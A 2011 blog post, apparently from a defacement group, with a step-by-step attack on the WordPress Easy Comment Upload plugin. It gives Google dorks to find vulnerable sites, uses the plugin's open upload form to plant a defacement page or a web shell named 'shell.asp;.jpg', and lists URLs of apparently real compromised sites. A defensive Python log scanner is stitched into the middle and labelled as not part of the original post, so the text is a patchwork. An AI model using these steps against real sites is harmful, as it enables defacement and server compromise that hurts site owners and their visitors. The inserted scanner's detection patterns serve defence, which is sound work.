Sunday, November 13, 2011

Vulnerability in WordPress found by Rwandan Hackers

WordPress Easy Comment Upload Vulnerability

Google Dork

"inurl:/wp-content/plugins/easy-comment-uploads/upload-form.php"

/wp-content/plugins/easy-comment-uploads/upload-form.php

Index of /wp-content/plugins/easy-comment-uploads

Open Google and enter any of the dorks given above.

Now select any website

and go to this URL: site.com/wp-content/plugins/easy-comment-uploads/upload-form.php

You'll get an upload option here :)

Now upload your deface ...

and check it here: site.com/wp-content/uploads/2011/05/yourfilehere

Note: On some websites you can upload your deface in txt only ... and you can upload a shell on only 50% of sites ... upload the shell in image format, e.g. shell.asp;.jpg
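For site owners, a log check for the requests described above, as an added example that is not part of the original post: it flags access to the plugin's upload form and fetches of uploaded files whose names hide a script extension (such as shell.asp;.jpg). The log lines are constructed, and the Combined Log Format, the extension list and the names `classify` and `scan` are assumptions.

```python
import re
from urllib.parse import unquote, urlsplit

# Paths as given on this page.
UPLOAD_FORM = "/wp-content/plugins/easy-comment-uploads/upload-form.php"
UPLOADS_DIR = "/wp-content/uploads/"
# Assumption: script extensions a server might execute; adjust for your stack.
# Matches the extension anywhere in the name, e.g. before ";" or a second ".".
EXEC_EXT = re.compile(r"\.(php\d?|phtml|asp|aspx|asa|cer|jsp|cgi|pl)(?=[.;]|$)", re.I)
# Assumption: Combined Log Format -> client, method, request target.
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "([A-Z]+) (\S+) ')

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE = [
    '192.0.2.10 - - [13/Nov/2011:10:00:01 +0000] "GET /wp-content/plugins/easy-comment-uploads/upload-form.php HTTP/1.1" 200 812',
    '192.0.2.10 - - [13/Nov/2011:10:00:09 +0000] "POST /wp-content/plugins/easy-comment-uploads/upload-form.php HTTP/1.1" 200 640',
    '192.0.2.10 - - [13/Nov/2011:10:00:15 +0000] "GET /wp-content/uploads/2011/11/shell.asp%3B.jpg HTTP/1.1" 200 51',
    '198.51.100.7 - - [13/Nov/2011:10:02:00 +0000] "GET /wp-content/uploads/2011/11/photo.jpg HTTP/1.1" 200 20480',
]

def classify(line):
    """Return (client, reason) for a suspicious request line, else None."""
    m = LINE.match(line)
    if not m:
        return None
    client, method, target = m.groups()
    # Decode %3B etc. first so an encoded ";" cannot hide the real extension.
    path = unquote(urlsplit(target).path).lower()
    if path == UPLOAD_FORM:
        return (client, "form-post" if method == "POST" else "form-probe")
    if path.startswith(UPLOADS_DIR) and EXEC_EXT.search(path.rsplit("/", 1)[-1]):
        return (client, "exec-name-in-uploads")
    return None

def scan(lines):
    """Map each client to the ordered list of reasons its requests were flagged."""
    hits = {}
    for line in lines:
        found = classify(line)
        if found:
            hits.setdefault(found[0], []).append(found[1])
    return hits

if __name__ == "__main__":
    for client, reasons in scan(SAMPLE).items():
        print(client, reasons)
```

A client showing form-post followed by exec-name-in-uploads matches the sequence this post describes and is worth checking against the files actually present under wp-content/uploads.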

Live Demo:

http://equator-indonesia.com/

http://equator-indonesia.com/wp-content/plugins/easy-comment-uploads/

http://www.findthepearl.com/wp-content/plugins/easy-comment-uploads/upload-form.php

http://equator-indonesia.com/wp-content/uploads/2011/11/hacked.tx
